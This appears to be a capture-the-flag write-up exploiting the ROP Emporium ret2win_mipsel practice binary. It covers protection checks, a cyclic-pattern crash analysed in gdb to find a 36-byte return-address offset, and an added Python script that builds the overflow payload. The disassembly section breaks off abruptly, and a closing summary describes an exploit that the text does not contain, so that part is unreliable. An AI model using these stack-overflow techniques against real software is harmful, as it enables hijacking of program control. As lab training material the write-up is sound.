ret2win_mipsel
Dependencies:
sudo apt install qemu-mipsel-static gcc-mipsel-linux-gnu
Information gathering
$ file ret2win_mipsel
ret2win_mipsel: ELF 32-bit LSB executable, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, interpreter /lib/ld.so.1, for GNU/Linux 3.2.0, BuildID[sha1]=cef0d672b72ee9c102ff2202072581aabafcb561, not stripped
$ checksec ret2win_mipsel
[*] '/home/starr/Documents/CProject/pwn/ret2win_mipsel'
Arch: mips64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE
checksec (pwntools) labels the architecture as 64-bit here, which is wrong: `file` identifies the binary as ELF 32-bit LSB, MIPS32 rel2, so it is a 32-bit little-endian MIPS executable with 4-byte addresses. The rest of the checksec output is what matters for exploitation: no stack canary, NX enabled, no PIE.
Black-box testing
$ ulimit -c unlimited && sudo bash -c 'echo %e.core.%p > /proc/sys/kernel/core_pattern'
$ cyclic 200 > cyclic.txt
$ qemu-mipsel-static ./ret2win_mipsel < cyclic.txt
ret2win by ROP Emporium
MIPS
For my first trick, I will attempt to fit 56 bytes of user input into 32 bytes of stack buffer!
What could possibly go wrong?
You there, may I have your input please? And don't worry about null bytes, we're using read()!
> Thank you!
qemu: uncaught target signal 11 (Segmentation fault) - core dumped
Segmentation fault
$ gdb-multiarch ./ret2win_mipsel qemu_ret2win_mipsel_20220506-203156_19548.core
...
Program terminated with signal SIGSEGV, Segmentation fault.
#0 0x6161616a in ?? ()
$ cyclic -l 0x6161616a
36
The crash offset is 36 bytes: the pattern bytes "jaaa" (0x6161616a read little-endian) land in the saved $ra, which the epilogue reloads and jumps to with jr $ra, so the faulting $pc shows the overwritten return address directly. The core file name qemu_ret2win_mipsel_..._19548.core comes from QEMU's user-mode emulator, which writes the dump itself (it still honours ulimit -c), so the core_pattern change above only affects native crashes.
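The following is an added example, not code from the original post or from ROP Emporium. It re-implements what `cyclic 200` and `cyclic -l 0x6161616a` do above (a de Bruijn sequence over a-z with unique 4-byte windows), so the offset can be checked offline for any pattern length, and lays out the padding plus new saved $ra that the 36-byte offset implies. The ret2win address handed to build_payload() is an assumed caller-supplied value; the page does not give it.

```python
"""pwntools-style cyclic pattern, offset lookup and payload layout (added example)."""
import itertools
import string

ALPHABET = string.ascii_lowercase.encode()  # pwntools' default cyclic alphabet
N = 4                                      # window size == MIPS32 register width


def de_bruijn(alphabet: bytes = ALPHABET, n: int = N):
    """Yield the de Bruijn sequence B(k, n) over `alphabet` byte by byte
    (Lyndon-word construction); every n-byte window is unique within one period."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t: int, p: int):
        if t > n:
            if n % p == 0:
                for i in range(1, p + 1):
                    yield alphabet[a[i]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


def cyclic(length: int) -> bytes:
    """Equivalent of `cyclic <length>`: the first `length` bytes of the pattern."""
    return bytes(itertools.islice(de_bruijn(), length))


def cyclic_find(value, length: int = 200) -> int:
    """Equivalent of `cyclic -l <value>` for a pattern made with cyclic(length).

    `value` is either the integer gdb shows in $pc (decoded little-endian, since
    the binary is ELF32 LSB) or the raw 4 bytes. Returns the offset, or -1."""
    if isinstance(value, int):
        value = value.to_bytes(N, "little")
    return cyclic(length).find(value)


def build_payload(offset: int, target: int, total: int = 56) -> bytes:
    """Layout the crash implies: `offset` filler bytes, then the new saved $ra.

    `total` is the 56 bytes the banner says read() consumes; the tail is NUL
    padding, which read() accepts. `target` is supplied by the caller (for
    example the ret2win address taken from the disassembly) and is not a value
    from the page."""
    if offset + N > total:
        raise ValueError("return address would not fit inside the read")
    payload = b"A" * offset + target.to_bytes(N, "little")
    return payload.ljust(total, b"\x00")


if __name__ == "__main__":
    import sys
    # Mirrors the black-box run: emit the 200-byte pattern for
    # `qemu-mipsel-static ./ret2win_mipsel < cyclic.txt`, then resolve the
    # faulting $pc seen in the core dump.
    sys.stdout.buffer.write(cyclic(200))
    sys.stderr.write(f"offset of 0x6161616a: {cyclic_find(0x6161616a)}\n")
```

Run it with stdout redirected to cyclic.txt to reproduce the input used above; cyclic_find(0x6161616a) returns 36, matching `cyclic -l`. Because the pattern's 4-byte windows are unique, the same lookup works for any register value captured from the core, and a -1 result means the register was not loaded from the controlled input at all.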
Disassembly
$ mipsel-linux-gnu-objdump -d ret2win_mipsel
ret2win_mipsel: file
Analysis of ret2win exploitation on MIPS and exploit development

This article covers information gathering, black-box testing and disassembly analysis of the MIPS ret2win_mipsel binary. The crash offset was found by enabling core dumps with ulimit, feeding a cyclic pattern and inspecting the core in gdb. Checking the binary's protections showed a stack overflow with no canary and NX enabled. IDA was then used to understand the function layout and identify what the payload must contain. Finally an exploit for the stack overflow was written and shown, but because the return address of main could not be located, the program ends up in an infinite loop.